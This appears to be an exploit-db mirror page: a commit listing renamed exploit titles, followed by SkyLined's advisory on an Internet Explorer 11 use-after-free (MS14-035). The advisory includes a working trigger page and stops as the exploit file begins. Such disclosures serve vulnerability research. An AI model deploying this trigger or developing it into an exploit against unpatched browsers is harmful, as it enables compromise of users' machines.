exploit-db-mirror/platforms/windows/dos/40946.html
Offensive Security be57520c6f DB: 2016-12-21
2 new exploits

FlashGet 1.9 - (FTP PWD Response) Remote Buffer Overflow (PoC)
FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)

VMware Workstation - 'hcmon.sys 6.0.0.45731' Local Denial of Service
VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service

Flashget 3.x - IEHelper Remote Exec (PoC)
FlashGet 3.x - IEHelper Remote Exec (PoC)

Rosoft media player 4.4.4 - Buffer Overflow (SEH) (PoC)
Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)
Google Android -  WifiNative::setHotlist Stack Overflow
Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)
FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK Overflow
FlashGet 1.9.0.1012 - (FTP PWD Response) Buffer Overflow (SafeSEH)
FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH STACK Overflow
FlashGet 1.9.0.1012 - 'FTP PWD Response' Buffer Overflow (SafeSEH)

freeFTPd - Remote Authentication Bypass
freeFTPd 1.2.6 - Remote Authentication Bypass

freeFTPd 1.0.10 - 'PASS' SEH Overflow (Metasploit)
freeFTPd 1.0.10 - 'PASS' SEH Buffer Overflow (Metasploit)

freeFTPd - 'PASS' Buffer Overflow (Metasploit)
freeFTPd 1.0.10 - 'PASS' Buffer Overflow (Metasploit)
AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion
iziContents RC6 - GLOBALS[] Remote Code Execution
AlberT-EasySite 1.0a5 - 'PSA_PATH' Parameter Remote File Inclusion
iziContents RC6 - Remote Code Execution

SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion
SunShop Shopping Cart 3.5 - 'abs_path' Parameter Remote File Inclusion

SunShop 4.0 RC 6 - 'Search' Blind SQL Injection
SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection

izicontents rc6 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities
iziContents rc6 - Remote File Inclusion / Local File Inclusion
gelato CMS 0.95 - (img) Remote File Disclosure
dotCMS 1.6 - 'id' Multiple Local File Inclusion
ZeeJobsite 2.0 - (adid) SQL Injection
gelato CMS 0.95 - 'img' Parameter Remote File Disclosure
dotCMS 1.6 - 'id' Parameter Local File Inclusion
Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection

XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion
XNova 0.8 sp1 - 'xnova_root_path' Parameter Remote File Inclusion

PHPBasket - 'product.php pro_id' SQL Injection
PHPBasket - 'pro_id' Parameter SQL Injection
Ad Board - 'id' SQL Injection
SunShop 4.1.4 - 'id' SQL Injection
Banner Management Script - 'tr.php id' SQL Injection
Ad Board - 'id' Parameter SQL Injection
SunShop Shopping Cart 4.1.4 - 'id' Parameter SQL Injection
Banner Management Script - 'id' Parameter SQL Injection
phpBazar 2.0.2 - (adid) SQL Injection
webEdition CMS - (we_objectID) Blind SQL Injection
CustomCMS 4.0 - (CCMS) print.php SQL Injection
phpBazar 2.0.2 - 'adid' Parameter SQL Injection
webEdition CMS - 'we_objectID' Parameter Blind SQL Injection
CustomCMS 4.0 - 'print.php' SQL Injection

TinyCMS 1.1.2 - (templater.php) Local File Inclusion
TinyCMS 1.1.2 - 'templater.php' Local File Inclusion
onenews Beta 2 - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities
5 star review - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
onenews Beta 2 - Cross-Site Scripting / HTML Injection / SQL Injection
5 star review - Cross-Site Scripting / SQL Injection

Web Directory Script 2.0 - (name) SQL Injection
Web Directory Script 2.0 - 'name' Parameter SQL Injection

Crafty Syntax Live Help 2.14.6 - (department) SQL Injection
Crafty Syntax Live Help 2.14.6 - 'department' Parameter SQL Injection
k-rate - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
CMME 1.12 - (Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory) Multiple Vulnerabilities
Thickbox Gallery 2.0 - (Admins.php) Admin Data Disclosure
k-rate - SQL Injection / Cross-Site Scripting
CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory
Thickbox Gallery 2.0 - 'Admins.php' Admin Data Disclosure

phpMyRealty 1.0.9 - Multiple SQL Injections
PHPMyRealty 1.0.9 - Multiple SQL Injections
brim 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Web Directory Script 1.5.3 - (site) SQL Injection
Words tag script 1.2 - (word) SQL Injection
Brim 2.0.0 - SQL Injection / Cross-Site Scripting
Web Directory Script 1.5.3 - 'site' Parameter SQL Injection
Words tag script 1.2 - 'word' Parameter SQL Injection

WeBid 0.5.4 - (item.php id) SQL Injection
WeBid 0.5.4 - 'item.php' SQL Injection

ZeeJobsite 2.0 - Arbitrary File Upload
Zeeways ZeeJobsite 2.0 - Arbitrary File Upload

BandSite CMS 1.1.4 - (members.php memid) SQL Injection
BandSite CMS 1.1.4 - 'members.php' SQL Injection

Thickbox Gallery 2 - 'index.php ln' Local File Inclusion
Thickbox Gallery 2 - 'index.php' Local File Inclusion

Joomla! Component 'com_wmtpic' 1.0 - SQL Injection
Joomla! Component com_wmtpic 1.0 - SQL Injection
Joomla! Component 'com_redshop' 1.0 - Local File Inclusion
Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion
Joomla! Component redSHOP 1.0 - Local File Inclusion
Joomla! Component redTWITTER 1.0 - Local File Inclusion
Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion
Joomla! Component 'com_shoutbox' - Local File Inclusion
Joomla! Component SVMap 1.1.1 - Local File Inclusion
Joomla! Component Shoutbox Pro - Local File Inclusion

Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion
Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion

Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection
Joomla! Component XOBBIX 1.0 - 'prodid' Parameter SQL Injection

Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion
Joomla! Component VJDEO 1.0 - Local File Inclusion

Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion

Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion
Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion

Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection
Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection

Joomla! Component 'com_tweetla' - Local File Inclusion
Joomla! Component TweetLA 1.0.1 - Local File Inclusion
Joomla! Component 'com_preventive' - Local File Inclusion
Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection
Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
Joomla! Component RokModule 1.1 - 'moduleid' Parameter Blind SQL Injection

Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion
Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion

Joomla! Component 'com_webtv' - Local File Inclusion
Joomla! Component Web TV 1.0 - Local File Inclusion

Joomla! Component 'com_onlineexam' - Local File Inclusion
Joomla! Component Online Exam 1.5.0 - Local File Inclusion

Joomla! Component 'com_sweetykeeper' - Local File Inclusion
Joomla! Component Sweetykeeper 1.5 - Local File Inclusion

Joomla! Component 'com_sermonspeaker' - SQL Injection
Joomla! Component SermonSpeaker - SQL Injection

Joomla! Component 'com_QPersonel' - SQL Injection
Joomla! Component QPersonel 1.0.2 - SQL Injection

Joomla! Component 'com_photobattle' - Local File Inclusion
Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
Joomla! Component 'com_zimbcomment' - Local File Inclusion
Joomla! Component 'com_zimbcore' - Local File Inclusion
Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
Joomla! Component ZiMBCore 0.1 - Local File Inclusion
Joomla! Component 'com_wmi' - Local File Inclusion
Joomla! Component 'com_orgchart' - Local File Inclusion
Joomla! Component WMI 1.5.0 - Local File Inclusion
Joomla! Component OrgChart 1.0.0 - Local File Inclusion

Joomla! Component 'com_ultimateportfolio' - Local File Inclusion
Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion

Joomla! Component 'com_smartsite' - Local File Inclusion
Joomla! Component SmartSite 1.0.0 - Local File Inclusion

Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion
Joomla! Component simpledownload 0.9.5 - Local File Inclusion

Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure
Joomla! Component simpledownload 0.9.5 - Local File Disclosure

Wordpress Plugin TinyBrowser - Arbitrary File Upload
WordPress Plugin TinyBrowser - Arbitrary File Upload

Joomla! Component 'com_qpersonel' 1.0 - SQL Injection
Joomla! Component Q-Personel 1.0 - SQL Injection

Joomla! Component 'com_searchlog' - SQL Injection
Joomla! Component Search Log 3.1.0 - SQL Injection

Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities
Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities

Joomla! Component 'com_picasa2gallery' - Local File Inclusion
Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion

Joomla! Component 'jeeventcalendar' - SQL Injection
Joomla! Component JE Ajax Event Calendar 1.0.5 - SQL Injection

Joomla! Component 'com_realtyna' - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
Joomla! Component 'jesubmit' - SQL Injection
Joomla! Component 'com_sef' - Remote File Inclusion
Joomla! Component jesubmit 1.4 - SQL Injection
Joomla! Component com_sef - Remote File Inclusion

Joomla! Component 'jesectionfinder' - Local File Inclusion
Joomla! Component jesectionfinder - Local File Inclusion

Joomla! Component 'Joomanager' - SQL Injection
Joomla! Component Joomanager - SQL Injection

Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting
Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting
Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection
Joomla! Component 'com_quickfaq' - Blind SQL Injection
Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection
Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection

Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection
Joomla! Component redSHOP 1.0.23.1 - Blind SQL Injection

Joomla! Component 'com_staticxt' - SQL Injection
Joomla! Component StaticXT - SQL Injection

Joomla! Component 'com_oziogallery' - SQL Injection
Joomla! Component Ozio Gallery - SQL Injection

Joomla! Component 'com_youtube' - SQL Injection
Joomla! Component YouTube 1.5 - SQL Injection

Joomla! Component 'com_ttvideo' 1.0 - SQL Injection
Joomla! Component TTVideo 1.0 - SQL Injection

Joomla! Component 'com_teams' - Multiple Blind SQL Injection
Joomla! Component Teams - Multiple Blind SQL Injection

Joomla! Component 'com_picsell' - Local File Disclosure
Joomla! Component PicSell 1.0 - Local File Disclosure

Joomla! Component 'com_restaurantguide' - Multiple Vulnerabilities
Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities

Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection
Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection

Joomla! Component 'com_sponsorwall' - SQL Injection
Joomla! Component Sponsor Wall 1.1 - SQL Injection

Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion
Joomla! Component ProDesk 1.5 - Local File Inclusion

Joomla! Component 'mdigg' - SQL Injection
Joomla! Component mDigg 2.2.8 - SQL Injection

phpMyRealty 1.0.7 - SQL Injection
PHPMyRealty 1.0.7 - SQL Injection

Joomla! Component 'com_timereturns' 2.0 - SQL Injection
Joomla! Component Time Returns 2.0 - SQL Injection

Joomla! Component 'com_techfolio' 1.0 - SQL Injection
Joomla! Component Techfolio 1.0 - SQL Injection

Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities
Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities

BRIM < 2.0.0 - SQL Injection
Brim < 2.0.0 - SQL Injection

Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection
Joomla! Component RokModule 1.1 - 'module' Parameter Blind SQL Injection

Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

webid 1.0.5 - Directory Traversal
weBid 1.0.5 - Directory Traversal

Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload
WordPress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload

Webid 1.0.6 - Multiple Vulnerabilities
WeBid 1.0.6 - Multiple Vulnerabilities
MyBulletinBoard RC4 - 'Username' Parameter SQL Injection
MyBulletinBoard RC4 - 'member.php' Multiple Parameter SQL Injection
MyBulletinBoard RC4 - 'polloptions' Parameter SQL Injection
MyBulletinBoard RC4 - 'action' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'Username' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'polloptions' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'action' Parameter SQL Injection

MyBulletinBoard 1.0 - Multiple SQL Injections
MyBulletinBoard (MyBB) 1.0 - Multiple SQL Injections

MyBulletinBoard 1.0 - 'RateThread.php' SQL Injection
MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection

MyBulletinBoard 1.0 - 'usercp.php' SQL Injection
MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection

Joomla! Component 'com_redshop' 1.2 - SQL Injection
Joomla! Component redSHOP 1.2 - SQL Injection

MyBulletinBoard 1.0.x/1.1.x - 'usercp.php' SQL Injection
MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection

MyBulletinBoard 1.x - 'usercp.php' Directory Traversal
MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal
Grayscale BandSite CMS 1.1 - help_news.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - help_merch.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - help_mp3.php max_file_size_purdy Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - sendemail.php message_text Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - header.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - login_header.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - bio_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - gbook_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - interview_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - links_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - lyrics_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - member_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - merch_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - mp3_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - news_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - pastshows_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - photo_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - releases_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - reviews_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - shows_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - signgbook_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - footer.php this_year Parameter Cross-Site Scripting
BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting
BandSite CMS 1.1 - 'help_merch.php' Cross-Site Scripting
BandSite CMS 1.1 - 'help_mp3.php' Cross-Site Scripting
BandSite CMS 1.1 - 'sendemail.php' Cross-Site Scripting
BandSite CMS 1.1 - 'header.php' Cross-Site Scripting
BandSite CMS 1.1 - 'login_header.php' Cross-Site Scripting
BandSite CMS 1.1 - 'bio_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'gbook_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'interview_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'links_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'lyrics_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'member_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'merch_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'mp3_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'news_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'pastshows_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'photo_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'releases_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'reviews_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'shows_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting

Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting
WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting

Active PHP BookMarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion
Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusion

Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting
WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting

TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Inclusion
SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion

Active PHP BookMarks 1.0 - APB.php Remote File Inclusion
Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion
TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection
TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting
SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection
SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting

Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery
WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery

DMCMS 0.7 - 'index.php' SQL Injection
deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection
EasySite 2.0 - browser.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - image_editor.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - 'browser.php' Remote File Inclusion
EasySite 2.0 - 'image_editor.php' Remote File Inclusion
EasySite 2.0 - 'skin_chooser.php' Remote File Inclusion

MatterDaddy Market 1.1 - 'admin/login.php' Cross-Site Scripting
MatterDaddy Market 1.1 - 'login.php' Cross-Site Scripting

Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
WordPress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Image Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Fields Attach 1.0 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access

Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access
Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Parameter Arbitrary File Access

Joomla! Component 'com_youtubegallery' - SQL Injection
Joomla! Component Youtube Gallery 4.1.7 - SQL Injection

Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection
Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection

Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection
Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection

Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload
WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting
WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting

Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal
WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal

Wordpress Plugin DukaPress 2.5.2 - Directory Traversal
WordPress Plugin DukaPress 2.5.2 - Directory Traversal

Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection
WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection

Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting
WordPress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting

Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation
WordPress Plugin Duplicator 0.5.8 - Privilege Escalation

Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection
WordPress Plugin Single Personal Message 1.0.3 - SQL Injection

Joomla! Component 'com_sanpham' - Multiple SQL Injections
Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections

Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload
WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload

Joomla! Component 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting
Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting

Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting

Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read
WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read

Joomla! Component 'mod_ccnewsletter' 1.0.7 - 'id' Parameter SQL Injection
Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection

Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection
WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection

Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting
WordPress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting

Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
Joomla! Component 'com_rpl' 8.9.2 - Multiple SQL Injections
Joomla! Component 'com_rpl' 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections
Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery

Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting
WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting

Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_sexypolling' - 'answer_id' Parameter SQL Injection
Joomla! Component Sexy polling 1.0.8 - 'answer_id' Parameter SQL Injection

Joomla! Component 'com_novasfh' - 'upload.php' Arbitrary File Upload
Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload

Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection
WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection

Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting
WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting

Wordpress Plugin Job Script by Scubez - Remote Code Execution
WordPress Plugin Job Script by Scubez - Remote Code Execution

Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite
WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite
Wordpress Plugin Answer My Question 1.3 - SQL Injection
Wordpress Plugin Sirv 1.3.1 - SQL Injection
Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection
Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection
WordPress Plugin Answer My Question 1.3 - SQL Injection
WordPress Plugin Sirv 1.3.1 - SQL Injection
WordPress Plugin BBS e-Franchise 1.1.1 - SQL Injection
WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection

Wordpress Plugin Olimometer 2.56 - SQL Injection
WordPress Plugin Olimometer 2.56 - SQL Injection

Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion
WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion
Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
2016-12-21 05:01:18 +00:00


<!--
Source: http://blog.skylined.nl/20161220001.html
Synopsis
A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 11. There is sufficient time between the free and reuse for an attacker to control the contents of the freed memory and exploit the vulnerability.
Known affected software, attack vectors and potential mitigations
Microsoft Internet Explorer 11
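An attacker would need to get a target user to open a specially crafted web-page. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path. Microsoft addressed the issue in MS14-035 (see the time-line at the end of this file), so installing that update removes the vulnerability rather than only blocking the trigger.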
Details
This was one of the first bugs where I attempted to do a proper analysis, and I got some feedback from ZDI that explained what I got right and what I got wrong. Basically, on x86, a 0x28 byte memory block is allocated in MSHTML!CMarkup::DoEmbedPointers when you execute document.execCommand("Delete"). This memory can be freed when you execute document.open() in a DOMNodeRemoved event handler. After that, you can use JavaScript to reallocate the memory before it is reused.
Repro.html:
<!doctype html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=11">
<script type="text/javascript">
// Minimal trigger for the use-after-free described under "Details".
// Microsoft fixed the issue in MS14-035 (see the time-line at the end of
// this file).
// The listener is registered for the capture phase (third argument true).
// Per the author's notes it runs while the "Delete" command issued from
// onload is still in progress, which is why the freed block is used again
// once the handler returns.
document.add­Event­Listener("DOMNode­Removed", function () {
document.open(); // free
// attempt to modify freed memory here
// because it will be reused after this function returns.
}, true);
window.onload = function () {
// designMode makes the document editable so the two edit commands apply.
document.design­Mode="on";
document.exec­Command("Select­All");
// Per "Details", this command allocates the 0x28-byte block (on x86) and
// removes nodes, which fires the DOMNodeRemoved handler registered above.
document.exec­Command("Delete"); // allocate
};
</script>
</head>
<body>
</body>
</html>
Exploit
After getting the feedback from ZDI that helped me understand the root cause, I attempted to write an exploit to show that the issue could be controlled and may be exploitable. I did not keep track of whether my attempts were successful, so the below code may not actually function. However, it should give you an idea of how one might go about writing an exploit for this vulnerability.
Sploit.html:
-->
<!doctype html>
<html>
<head>
